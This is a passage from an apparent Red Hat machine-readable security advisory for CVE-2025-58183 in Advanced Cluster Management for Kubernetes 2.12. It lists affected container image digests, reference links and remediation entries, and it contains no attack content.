"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "RHBZ#2407258",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407258"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://go.dev/cl/709861",
"url": "https://go.dev/cl/709861"
},
{
"category": "external",
"summary": "https://go.dev/issue/75677",
"url": "https://go.dev/issue/75677"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI",
"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4014",
"url": "https://pkg.go.dev/vuln/GO-2025-4014"
}
],
"release_date": "2025-10-29T22:10:14.376000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:07:27+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5633"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
